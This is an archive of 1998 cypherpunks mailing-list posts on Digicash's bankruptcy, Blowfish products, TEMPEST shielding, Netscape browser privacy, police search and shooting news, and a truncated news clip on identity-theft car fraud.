FBI wiretapping capabilities.

> No, regulation does not automaticaly imply force.

Correct -- in fact the only regulations by private individuals/entities that
*do* have force behind them is that of the custodian/dependent relationship,
and they are limited. But find a government regulation that does not have
the confiscation of your property (by force) and/or incarceration of your
person (by force) as the absolute finality to non-compliance. They are few.

> Yeah, so. I don't believe this is relevant since we all agree 
> on this.

Oh, I forgot if you agree it irrelevant because you are simply being
entirely combative.

> I got news for you dude, I catch you in my truck after dark 
> or running down the street with my property I'm perfectly 
> within my rights to initiate force.

But you are not the initiator, you are reacting to my initiation of a force
(or derivative), in this case trespass and theft.

> You mean in an insiteful manner. You aren't talking 
> about reacting to something you're veiled comment is 

No, force in reaction to force. That is plainly simple.

> > You have absolutely *no* freedom to use it
> > reactionary against government (which is in the face of the 4th).

Brain fart, the 2nd. The right to bears arms has historically implied the
right to bear arms in defense against a despot.

	Matt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 6 Nov 1998 05:49:49 +0800
To: cypherpunks@Algebra.COM
Subject: Re: TEMPEST laptops
Message-ID: <199811052109.WAA21423@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 09:45 PM 11/4/98 -0800, Tim May wrote:
>>The other question is how hard, given a _specific_ machine would it be to
>>create a "RF" jammer? Sort of an active defense versus the passive defense
>>of a Tempest sheild. build a device that measures the RF coming off a

Well dang Tim, if you're gonna work inside a Faraday cage you
may as well run a Tesla coil outside it... 


--Lace Aliens Slide on my Rugs










  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Narayan Raghu <narry@geocities.com>
Date: Fri, 6 Nov 1998 13:26:02 +0800
To: Bill Stewart <bill.stewart@pobox.com>
Subject: Re: new 448 bit key by Indian firm
In-Reply-To: <v04020a0ab263d0da7260@[139.167.130.246]>
Message-ID: <3641D5F0.8DFAE64C@geocities.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill Stewart wrote:
> 
> At 03:43 AM 11/3/98 +0530, Narayan Raghu wrote:
> >            Indian firm unveils 448-bit encryption
> 
> 448 bits sounds a lot like MD5-based encryption - perhaps Luby-Rackoff
> or MDC?
> Or a homegrown system, doing successive MD5s or something?
> MD5 is no longer the safest hash these days....
> 
>                                 Thanks!
>                                         Bill

Nopes.

It's an  implementation of blowfish.

you might get some info at www.signotron.com
the guy at the fair claimed that it's the strongest existing
implementation of cryptography available in the world to date .. and he
was no "sales" guy - seemed technical enough ... 

what this s/w seems to be doing is that it gets into ur windows OS,
(works ONLY on windows) and everytime you "save" a file, it captures it,
encrypts it, and stores it .. so nothing on your disc is ever left
unencrypted.

ofcourse there must be a lot of such packages in the US .. but the
novelty here, according to this guy was that it was developed outside
the US, and it's price (USD 40) ....


rgds
nar




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 6 Nov 1998 06:06:15 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199811052119.WAA22172@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



:: 
Subject: more on Dore's discovery of intelligence (satellite 415)


http://www.enterprisemission.com/images/auscnfrm.jpg
http://www.lunaranomalies.com/update2.htm
http://news.bbc.co.uk/hi/english/sci/tech/newsid_203000/203133.stm









  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phillip Hallam-Baker" <hallam@ai.mit.edu>
Date: Fri, 6 Nov 1998 12:15:36 +0800
To: <dcsb@ai.mit.edu>
Subject: RE: Digicash bankruptcy
In-Reply-To: <004d01be0937$e147c160$0300a8c0@sjl4120>
Message-ID: <002701be0939$b34ce720$bf011712@games>
MIME-Version: 1.0
Content-Type: text/plain





> > Finaly I have difficulty regarding Digicash as being all that socially
> > responsible. Chaum's problems had a lot to do with the business terms
> > he insisted on. What he had was a technology which allowed an 
> improvement
> > to a payment system. He imagined he had a monopoly on the only feasible
> > solution. He was very baddly mistaken. The monopoly rents he demanded
> > were more than the market was willing to pay for a working and deployed
> > system - let alone for a patent license.
> 
> Where does the "monopoly rents" comment come from?  
> 
> In other words, on what basis are you making that statement?

Chaum's reported demands for patent licensing fees were consistently
above 10-20% of the service revenue plus a significant up front fee.
Those levels are more usually associate with a monopolistic patent,
hence 'monopoly rent'.

The fact that Chaum didn't have the monopoly he appeared to imagine
is probably why nobody was queuing up to pay his demands.


		Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 6 Nov 1998 12:51:29 +0800
To: Phil Agre <cypherpunks@cyberpass.net
Subject: Re: FYI:  Digicash bankruptcy
Message-ID: <v04020a21b26824e771c7@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


From: "Thomas Junker" <tjunker@phoenix.net>
To: dbs@philodox.com
Date: Thu, 5 Nov 1998 21:32:24 -0600
MIME-Version: 1.0
Subject: Re: FYI:  Digicash bankruptcy
Reply-to: Thomas Junker <tjunker@phoenix.net>
Priority: normal
Sender: <dbs@philodox.com>
Precedence: Bulk
List-Subscribe: <mailto:requests@philodox.com?subject=subscribe%20dbs>
X-Web-Archive: http://www.philodox.com/dbs-archive/

On 5 Nov 98, at 14:32, Nahum Goldmann quoted Phil Agre as having writ:

> [With the bankruptcy of Digicash, it is time to assemble the definitive
> list of underperforming Internet technologies.  The received wisdom is
> that the Internet lies at the vortex of a historically unprecedented era
> of intensive and disruptive technological change.  A sober reading of the
> evidence, however, supports something much closer to the opposite thesis,
> viz, the Internet is a modest and useful new tool that, despite itself,
> has given rise to an astonishingly wasteful mania whereby perfectly good
> capital is plowed into one ill-conceived technology after another.

Is Agre a friend of Metcalfe?  One wrings his hands over what other people
choose to risk their money on in Internet technology development and the other
solemnly predicts that the Internet will implode.  If those two guys ever get
together, the ambient lumens will dim for miles around.  NRO will be
repositioning satellites to check out the grey hole of pessimism laying like a
blanket over their meeting place.

> So right now would be an excellent time
> for us to renounce the false idea that we are living in a time of
> unprecedented technical change.

Yeah, right.  Listen to this guy and die.  That's his message.

> ...it is running behind the penetration rates that
> earlier technologies such as the radio and gas cooking achieved once they
> started being adopted on a mass scale...

Had this guy been commenting back then, he would no doubt have been wringing
his hands over all the silly things being done with radio and all the failed
ideas and ventures.  Checking out those future-fantasy clips from the '50's is
instructive... I *still* don't have a kitchen or bathroom as spiffy as what
they were telling everyone they would have a few short years -- I don't have a
constant-temperature shower or cleverly designed foldaway shelves, tables,
trays and ironing boards hidden in every nook and cranny of the kitchen.  In
fact, looking at one of those on video got me in the mood to go back 40 years
so I could look forward to having those neat things.

More importantly, though, as great as the utility of radio has been in many
areas, it has mostly been a one-way incoming pipe for the average person.  Its
greatest utility value in that mode has probably been news delivery, but that
is highly overrated.  If you tune out the news in all forms for two weeks, you
will be a lot less stressed and realize that, by and large, what makes the
news doesn't care a whit about you, and if you con't care a whit about the
news, no pieces of the sky fall in.  If radio hadn't been regulated as badly
and suffocatingly as it was, and if people without propellors on their heads
could have used it to communicate with friends and associates over long
distances instead of waiting for telephone operators to call them back to tell
them a trunk had become available for their annual long distance call to
Mamain Toledo, perhaps radio would have had a hugely greater impact than it
did.  Radio came, radio was monopolized, and it became just another flavor of
newspaper or magazine.

Now gas, there's a revolutionary development!  Convenient, yes.
Revolutionary, no.  Were we able to cook before gas?  Were we able to heat
before gas?  Did gas mean that Father no longer had to trek to an office or
factory to earn his living?  Were we suddenly able to shuttle business
documents back and forth between Passaic, New Jersey and Jakarta at zero
incremental cost? Did gas perhaps enable millions of people to shift their
modes of work and cut the ties with fixed offices?  Maybe gas enabled
multimedia communication, as in Smell-o-Vision?  Geez!  So it was convenient.
So lots of people rushed out and utilized it in a short time.  So?  What did
it change?  It may have made some industrial processes cheaper or more
feasible.  It made some very uninteresting aspects of life less time and
attention consuming.  <yawn>

> Internet protocols that we use today are unchanged in their essentials
> from about 1982.

Isn't that like denigrating all of wheeled transport by pointing out that gee,
the wheels we use today are unchanged in their essentials from about 4000 B.C.
(or whenever)?  And your point is...?

> In fact, once the real history of this era is written, I
> think that 1982 will shape up as the true annus mirabilis, and 1994 will
> simply be seen as the era when the innovations of ten to fifteen years
> earlier finally caught public attention and reached the price point that
> was needed to achieve the network externalities required for its large-
> scale adoption.

Can you spell M-O-S-A-I-C?

> If we get out the rake and drag away all of the detritus
> of the underperforming technologies that I listed above, and compare our
> times on an apples-for-apples basis with other periods of technological
> innovation -- including the Depression era, for heaven's sake -- then I
> think we will have a much healthier perspective going forward.

Yes indeedy, that's what we should all do when we need a lift -- drag out
Dad's or Grandpa's Depression scrapbook and get some *real* perspective!
That'll drive out that pesky optimism and make us thankful for not having to
run down the road chasing the family farm as it blows away in the wind.
Yessirree, those pics of Uncle Dwork selling apples will straighten us right
up and dispel those silly fantasies of interconnecting the world, working from
Tahiti, or making a killing with a killer Internet app.  There oughta be a
law!  It should be illegal to offend good, pessimistic outlooks by running
around in circles showering ideas and developments like sparks.

> As it is,
> people the world over have been propagandized into a state of panic, one
> that encourages them to abandon all of their experience and common sense
> and buy lots of computer equipment so that they will not be scorned by
> their children and left behind by the apocalypse

Where does this guy *get* this stuff?  How many people do we *know* who fit
this description, hmmm?  Even one?  Well, OK, but Aunt Mabel doesn't count --
she invested in bull semen, too, though we all thought she did it with just a
tad too much enthusiasm.

> The sad line-up of underperforming technologies should be
> understood not as serious attempts at innovation but as a kind of ritual,
> an expensive and counterproductive substitute for the chants and dances
> that healthy societies perform when they are placed under stress.  Maybe
> once we get some healthy rituals for contending with technological change
> ourselves, we will be able to snap out of our trance, cast off the
> ridiculous hopes and fears of an artificially induced millennium, and take
> up the serious work of discussing, organizing, and contesting the major
> choices about our institutions that lie ahead.]

Oh, geez, I can hear this now, around 1725 or 1750... people in England and on
the continent, naysaying the wild and wooly schemes and hopes for opportunity
and fortune in the new world.  It must be part of the curse of the human
condition that we have to have gloomy people like this hanging on the
coattails of invention, being dragged kicking and screaming into a future they
cannot avoid no matter *how* loudly they complain.

Regards,

Thomas Junker
tjunker@phoenix.net

http://www.phoenix.net/~tjunker/wang.html
The Unofficial Wang VS Information Center

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 6 Nov 1998 07:46:45 +0800
To: cypherpunks@cyberpass.net
Subject: Euro-Telecoms Standards gives access to GSM & other specs
Message-ID: <199811052322.XAA02881@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Someone pointed out this information to me.  

The European Telecommunications Standards Institute (ETSI) have
granted access to allow everyone, not just members, to their
specifications.  These include the GSM specs. Start here:

    http://webapp.etsi.org/publicationssearch/

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 6 Nov 1998 08:43:16 +0800
To: bill.stewart@pobox.com
Subject: Re: new 448 bit key by Indian firm
In-Reply-To: <3.0.5.32.19981104234056.008b6880@idiom.com>
Message-ID: <199811052342.XAA03335@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Bill Stewart writes:
> 448 bits sounds a lot like MD5-based encryption - perhaps
> Luby-Rackoff or MDC?  Or a homegrown system, doing successive MD5s
> or something?  MD5 is no longer the safest hash these days....

More likely Blowfish for two reasons i) the article mentioned blowfish
at the bottom (;-), and ii) blowfish keys can be up to 448 bits.

Could be snake oil, or could be result of letting marketroid near
press release.  The press release was very confused in general.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Fri, 6 Nov 1998 16:54:13 +0800
To: cypherpunks@Algebra.COM
Subject: Re: TEMPEST laptops
In-Reply-To: <199811052109.WAA21423@replay.com>
Message-ID: <v0311070cb2685122e828@[209.109.232.44]>
MIME-Version: 1.0
Content-Type: text/plain



Not exactly a laptop thing, but it occurs to me that you might be able to
get destructive interference of the signal waves from a monitor by running
two monitors, and sending inverse signals to each.  If we assume the signal
is 100MHz, that means a wavelength of 3 meters.  You probably need small
monitors close together.


-------------------------------------------------------------------------
Bill Frantz       | Macintosh: Didn't do every-| Periwinkle -- Consulting
(408)356-8506     | thing right, but did know  | 16345 Englewood Ave.
frantz@netcom.com | the century would end.     | Los Gatos, CA 95032, USA





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: x <x@x.com>
Date: Fri, 6 Nov 1998 16:57:09 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Netscape inside scoop on "Smart Browsing"
Message-ID: <3.0.32.19981106004101.0071a044@shell15.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



Natrificial's "Brain" product did the same thing, silently, or at least via
a nonobvious option setting that was not explicitly documented.  The
transmittal of all your URL's to the mother ship was how they would inform
you that you were hitting a page specially enabled for their S/W.  Totally
unnecessary, as the page, if so enabled, would be perfectly capable of
notifying the browser with the addition of a trivial plugin, e.g. or other
thing.  I raised the issue of disclosing this kind of thing and got the
usual "we're technology users too and we'd NEVER do anything with that
information..." response, like it's no big deal.  I stopped using and
recommending the product, even though it looked like with the proper option
setting I would no longer be reporting my bizarre habits to Natrificial.

This shit's outta hand .....




>> * IS SMART BROWSING REALLY SO SMART?
>> (contributed by Mark Joseph Edwards, http://www.ntsecurity.net)
>> Many of you are aware of Netscape's new versions of its Navigator Web
>> browser. But do you also know that, starting with version 4.06, the
>> product's Smart Browsing feature can report to Netscape every Web page
>> you visit, including addresses to private sites on your internal
>> network? And are you aware that when you download a secure version of
>> Netscape's browser, the process places a cookie on your system that can
... etc ...
>>
>
>Rick Desautels
>Sr. Systems Engineer
>Rival Computer Solutions
>rivalcs@ma.ultranet.com
>
>
>--
>To unsubscribe from this list, send mail to majordomo@blu.org
>with the following text in the *body* (*not* the subject line) of the letter:
>unsubscribe isig
>
>--- end forwarded text
>
>
>-----------------
>Robert A. Hettinga <mailto: rah@philodox.com>
>Philodox Financial Technology Evangelism <http://www.philodox.com/>
>44 Farquhar Street, Boston, MA 02131 USA
>"... however it may deserve respect for its usefulness and antiquity,
>[predicting the end of the world] has not been found agreeable to
>experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
>
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 6 Nov 1998 08:24:19 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Holloween II: Microsoft Plugs Linux
In-Reply-To: <v04020a19b267d03a89c2@[139.167.130.246]>
Message-ID: <199811052356.AAA03329@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



If you liked Eric's halloween.html, you'll this one too -- chock full
of hilarious Microsoft misunderstandings about Linux.

  > http://www.opensource.org/halloween2.html is a more extensive...
  > internal analysis of Linux by Microsoft.

Naughty boy, Robert -- now you've made me get coffee all over my
keyboard:

  "The GCC and PERL language compilers are often provided for free
   with all versions of Linux...
   By the standards of the ... developer accustomed to VB [Visual
   Basic], these tools are incredibly primitive."

ROTFL!  This is obviously a hitherto unknown meaning for the word
"primitive".

OTOH, Vinod and Josh summarise things pretty well.
Well worth reading (but read halloween.html first).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 6 Nov 1998 08:23:20 +0800
To: cypherpunks@Algebra.COM
Subject: No Subject
Message-ID: <199811052358.AAA03470@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



24 shots came from 1 officer in Oregon case

Policeman fired until gun empty, then reloaded and kept firing

By BOB SABLATURA
Copyright 1998 Houston Chronicle

One of the officers nobilled in the death of Pedro Oregon Navarro fired his semiautomatic pistol at the 22-year-old man until the
magazine was empty, then reloaded and continued firing. 

In all, Officer David R. Barrera fired 24 of the 33 shots discharged in Oregon's southwest Houston apartment July 12, according to
sources familiar with the investigation. 

Assistant District Attorney Ed Porter confirmed that Barrera fired most of the shots. While the medical examiner's office could not
determine the exact caliber of the bullets that made the 12 wounds in Oregon's body, Porter said, three of the four bullets recovered
from the body were fired from Barrera's weapon. 

Porter, who was present on the scene a few hours after the shooting -- and reconstructed it during a walk-through with the officers
involved -- suggested that the bullets that struck Oregon may have been some of the last shots that the officers fired. 

"I strongly suspect that was the case," Porter said. 

Richard Mithoff, an attorney representing Oregon's family, said it is "incomprehensible" that one of the officers paused to reload his
weapon. 

"They had no grounds to be in the apartment, and no grounds to open fire," Mithoff said. "And if this is true, there certainly was no
grounds to reload and execute this guy lying on the ground." 

Aaron Ruby, a member of the Justice for Pedro Oregon Coalition, said Barrera's actions could only be termed "homicidal and
premeditated," and probably explain the numerous bullet holes in Oregon's back. 

"If that fact was known to the grand jury, it makes their actions all the more outrageous," Ruby said. "I believe the people of Houston
will be stunned when they learn of this." 

Harris County District Attorney John B. Holmes Jr. said state law allows police officers to use deadly force if they believe it
necessary for self-defense and can continue shooting "so long as they reasonably perceive" the threat continues. 

"An analogy I use is that if it is OK to kill a guy dead, it is OK to kill him dead, dead, dead," Holmes said. 

Holmes said it is also not uncommon for a police officer involved in a shooting to have no idea how many shots he fired. 

Barrera, a five-year veteran of the Houston Police Department, was armed with a 9 mm Sig-Sauer semi-automatic pistol loaded with
nylon-coated bullets. 

According to the Police Department, after illegally entering Oregon's apartment with fellow members of the HPD gang task force in
an unsuccessful search for drugs, Barrera and several other officers chased Oregon to his bedroom and kicked in the locked door.
During the pursuit, Barrera's pistol discharged, striking one of his partners in the shoulder. 

The officers said they believed they were being shot at, and two officers joined Barrera in firing at Oregon. 

Barrera emptied his pistol, paused to reload a new magazine, and resumed firing, according to prosecutors. 

Investigators later determined that Barrera fired a total of 24 rounds. 

Barrera's weapon was originally loaded with a standard 16-round magazine, which held at least 14 rounds. He reloaded with an
extended magazine holding even more rounds. The second magazine was not emptied, according to sources. 

Officers David R. Perkins and Pete A. Herrada fired a total of nine rounds between them. Both officers were armed with similar
.40-caliber handguns. Perkins carried a Sig-Sauer Model 40 and Herrada was armed with a Glock Model 23. 

Prosecutors said only about 10 seconds elapsed from the time the shooting began to the time it ended. 

Semi-automatic pistols typically are double-action on the first shot, meaning that pulling the trigger draws the hammer back --
cocking it -- and then releases it. 

After the first shot, the hammer remains in a cocked position so less trigger-tension is required to fire the weapon, making it fire
quicker. The officer can also aim the gun more accurately because it takes less movement of the trigger to discharge shots. 

Oregon's body was hit 12 times, nine times in the back, once in the back of the shoulder, and once in the back of his left hand. In
addition, one shot entered the top of his head, exiting above the right ear. 

At least nine shots entered his body at a downward angle, suggesting he was shot while face-down on the floor. Four bullets were
recovered from Oregon's body, and numerous bullet fragments were found underneath the carpet beneath the body. 

The body was face-down, with his head toward the doorway through which the police officers were firing. 

Attorneys for the Oregon family dispute the police officers' version of events, and say Oregon was not in the front of the apartment
when police illegally barged in. 

"It is my understanding that he was in the bedroom," Mithoff said. 

They also contend that some of the officers' shots were fired through the bedroom wall, indicating they were blindly firing into the
room. 

Porter said he has examined numerous crime scenes involving police shootings during his career and is amazed just how often shots
fired by police officers miss their mark. 

"Most people think an officer fires a weapon and someone gets shot," Porter said. "Often that is just not the case." 

Holmes said the grand jury heard evidence regarding all the shots fired, the trajectory of the bullets, the position of the officers and
the medical examiner's reports regarding wounds to Oregon's body. 

"The specific number of times and the path of the projectiles was known to the grand jury," Holmes said. 

After hearing all the evidence, a grand jury cleared five of the six officers -- including Barrera -- of all charges. One officer was
charged with a misdemeanor offense of criminal trespass. 

Earlier this week, all six officers were fired by Chief C.O. Bradford for violating the law and ignoring department procedures. 

Barrera's attorney did not respond to a request for an interview. 

Rick Dovalina, national president of LULAC, said he is especially concerned that HPD Internal Affairs found the officers had
violated the law in conducting the raid, but the grand jury had brought no charges. 

He renewed his call for Holmes to try to bring charges against the officers. 

"They are both supposed to be looking at the same evidence," Dovalina said. "Johnny Holmes needs to do the right thing and present
the case to another grand jury." 



Posted for the entertainment of those that chide Tim for being armed to the teeth.

Regards,
TimeToBuyAGun
        




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 6 Nov 1998 13:54:43 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Holloween II: Microsoft Plugs Linux
In-Reply-To: <003f01be092a$5ee1b800$692856cf@frohike.novita.com>
Message-ID: <199811060531.GAA00781@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>>>>> Mark Lanett <mlanett@meer.net> writes:

  >> By the standards of the novice / intermediate developer
  >> accustomed to VB/VS/VC/VJ, these tools are incredibly
  >> primitive.

  > Which is completely correct...

Perhaps I missed the part of Visual Basic that was supposed to be
"incredibly" less "primitive" than GCC and PERL.

Unfortunately, I have to actually *use* VB5 for my employer (who will
remain nameless, other than to say that they're one of the world's
largest electronics manufacturers, and firmly in bed with Micro$oft).

So far as I have been able to discern, its only advantage is the
ability to prototype screens quickly.  When it comes to actually
*debugging*, any reasonably large program causes enough system crashes
that you've got to try to build mini test environments to test out
individual pieces.  (Yup, it's exactly as good a programming
environment as M$ Word is a desktop publishing environment.)

Sure, GCC is just a compiler.  But my combination of GCC, DDD, and
XEmacs provide a development environment that is more powerful than
any of Microsoft's products, as easy to use, and is just as "mouse-
friendly".  (Hell, I use GCC instead of VC for NT code, too.)

Maybe I've been out of the "novice" stage for too long to understand
the attraction of VB.  But the other hardware engineers (certainly
novice programmers) in this group won't touch it except at gunpoint
either.  But its use -- like that of NT itself -- has been mandated
from above by beancounters and IT managers.

-- CurmudgeonMonger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Fri, 6 Nov 1998 23:25:26 +0800
To: <cypherpunks@cyberpass.net>
Subject: RE: Holloween II: Microsoft Plugs Linux
In-Reply-To: <v04020a19b267d03a89c2@[139.167.130.246]>
Message-ID: <000d01be0992$d5438600$598195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



I thought the name Vinod Vallopillil was familiar as of someone who was on
cpunks for a while, in 1995.   If my memory serves me well, I think it was him
who for a while he had this idea of putting together some learning
lectures/sessions locally on economics.   I expressed interest, but then he left
for school again (he was an intern at MS at the time).   I checked the archives
for his name, and found some of his posts on "credit card conventional wisdom".
This is what was on his sig in a 1995:

LibertarianismTelecommunicationsFreeMarketEnvi
 ronmentalismTechnologyCryptographyElectronicCa
 shInteractiveTelevisionEconomicsPhilosophyDigi
 talPrivacyAnarchoCapitalismRuggedIndividualism

   ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 6 Nov 1998 21:37:06 +0800
To: cypherpunks@cyberpass.net
Subject: Nov. 8 column - stop and search
Message-ID: <v04020a26b2689e5662d1@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Resent-Date: Fri, 6 Nov 1998 00:44:48 -0700
Date: Thu, 5 Nov 1998 23:42:03 -0800 (PST)
X-Sender: vin@dali.lvrj.com
Mime-Version: 1.0
To: vinsends@ezlink.com
From: Vin_Suprynowicz@lvrj.com (Vin Suprynowicz)
Subject: Nov. 8 column - stop and search
Resent-From: vinsends@ezlink.com
X-Mailing-List: <vinsends@ezlink.com> archive/latest/585
X-Loop: vinsends@ezlink.com
Precedence: list
Resent-Sender: vinsends-request@ezlink.com


    FROM MOUNTAIN MEDIA
    FOR IMMEDIATE RELEASE DATED NOV. 8, 1998
    THE LIBERTARIAN, By Vin Suprynowicz
    To enhance officer safety and convenience

    Fortunately, even the most traditionally "law-and-order" members of the
U.S. Supreme Court seemed both surprised and skeptical Tuesday when
confronted with the broad discretion which Iowa now grants its police to
search drivers pulled over for routine traffic violations ... even without
any "probable cause" to believe a further crime has been committed.

  Appellant Patrick Knowles was stopped for speeding on March 6, 1996, in
Newton, Iowa. An officer gave Knowles a speeding ticket and then informed
him he had a right to search Knowles and his cart, which the cop proceeded
to do.

  The search turned up a pipe and a small quantity of marijuana, which Iowa
courts allowed to be used as evidence. Knowles was convicted and sentenced
to 90 days in jail, but is now appealing based on the Constitution's Fourth
Amendment protection against unreasonable searches.

  "If somebody jaywalks, the police could search them?" asked Justice John
Paul Stevens.

  "Correct," explained Iowa Assistant Attorney General Bridget A. Chambers.

  Justice Antonin Scalia then asked Ms. Chambers whether an officer could
stop someone, arrest and search them, and then drop the arrest. Yes, she
said.

  "Wow," the justice responded.

  The record of the initial court case reveals that arresting Officer
Ronald Cook was "disarmingly candid" on the subject of probable cause, in
the phrase of long-term court watcher James J. Kilpatrick.

  "Anything you observed lead you to believe or give you probable cause to
believe that he was involved in criminal activity?" the officer was asked.

  "Not on this date, no," he responded.

 "It was your understanding that simply because you had issued him a
citation that that gave you the right to search him and his vehicle?"

  "Yes, ma'am."

  About 400,000 people are given traffic tickets each year in Iowa,
Knowles' lawyer, Paul Rosenberg, told the high court Tuesday. But police
invoke their authority to conduct searches only selectively, since if
everyone given a traffic ticket were searched, "the people wouldn't stand
for it."

  Chief Justice William H. Rehnquist reminded the parties that police
already have authority to conduct a search following an arrest, to protect
their own safety and to preserve evidence.

  But regarding a need to preserve evidence, the chief justice added, "When
you have a traffic stop, you're not going to find any more evidence of
speeding when you search a person's car."

  The Supreme Court's 1973 decision allows police to conduct a "search
incident to arrest," noted Justice Anthony M. Kennedy. But "You want to
turn it around and have an arrest incident to search. ... It seems to me
that would be an abuse of authority."

  "It does seem an enormous amount of authority to put into the hands of
the police," agreed Justice Ruth Bader Ginsburg.

  Regular observers of the court warn us not to draw too many conclusions
from the jurists' questions alone -- the justices have been known to play
devil's advocate, challenging the position of a party whose side they
actually intend to favor, in order to better develop their own arguments.

  But this sounds like a case where the court's astonishment over Iowa's
brazen defiance of the Constitutional ban on "unreasonable" and warrantless
searches was no sham.

  The notion that we should not object to government agents stopping and
frisking any passer-by since "It's for the protection of everyone" and "The
innocent have nothing to fear," is the next-to-last stop on the one-way
trainride to tyranny.

  Yes, such measures appear to make the policeman's lot a bit easier, in
the short run. But once the populace begin to see these officers not as
friendly keepers of the peace and protectors of our liberties, but rather
as a hostile occupying army, patting us down and muscling through our
belongings at will, that could quickly change.

  As the Hessians learned in 1776.

  The high court is expected to rule in the case of Mr. Knowles by July.
Let us hope the Supremes set a firm high water mark for this particular
tide of tyranny, and begin to roll it back. Cops deserve our praise and
support when they undertake the dangerous job of chasing down violent thugs
and felons -- but not when they turn to rummaging through our pockets, our
glove compartments, and our sock drawers.


Vin Suprynowicz is the assistant editorial page editor of the Las Vegas
Review-Journal. Readers may contact him via e-mail at vin@lvrj.com. The web
sites for the Suprynowicz column are at
http://www.infomagic.com/liberty/vinyard.htm, and
http://www.nguworld.com/vindex/. The column is syndicated in the United
States and Canada via Mountain Media Syndications, P.O. Box 4422, Las Vegas
Nev. 89127.

***


Vin Suprynowicz,   vin@lvrj.com

The evils of tyranny are rarely seen but by him who resists it. -- John
Hay, 1872

The most difficult struggle of all is the one within ourselves. Let us not
get accustomed and adjusted to these conditions. The one who adjusts ceases
to discriminate between good and evil.  He becomes a slave in body and
soul. Whatever may happen to you, remember always: Don't adjust! Revolt
against the reality! -- Mordechai Anielewicz, Warsaw, 1943

* * *

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 6 Nov 1998 21:41:48 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 6.16: Using Credit Reports Crooks Assume YourIdentity & Buy Luxury Cars
Message-ID: <v04020a29b268a14c152f@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
From: "ama-gi ISPI" <offshore@email.msn.com>
To: <Undisclosed.Recipients@majordomo.pobox.com>
Subject: IP: ISPI Clips 6.16: Using Credit Reports Crooks Assume Your
Identity & Buy Luxury Cars
Date: Fri, 6 Nov 1998 00:26:20 -0800
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: "ama-gi ISPI" <offshore@email.msn.com>

ISPI Clips 6.16: Using Credit Reports Crooks Assume Your Identity & Buy
Luxury Cars
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Friday November 6, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: The Las Angeles Times, Friday, October 23, 1998
http://www.latimes.com

Grand Theft Auto Enters the Computer Age
http://www.latimes.com/HOME/NEWS/LIFE/AUTO/AUTONEWS/t000096175.html

    Crime: Hackers are using cyberspace to obtain credit information
    and purchase luxury vehicles under assumed identities.

By
SCOTT GLOVER,
Times Staff Writer

In a new twist on an old crime, computer-savvy thieves have begun hacking
into credit files and fabricating drivers' licenses, then walking into car
dealerships and buying luxury cars under assumed identities, authorities
said.

After putting about $10,000 down for a new $120,000 Mercedes-Benz,
authorities say, the thief then drives off the lot, leaving behind a
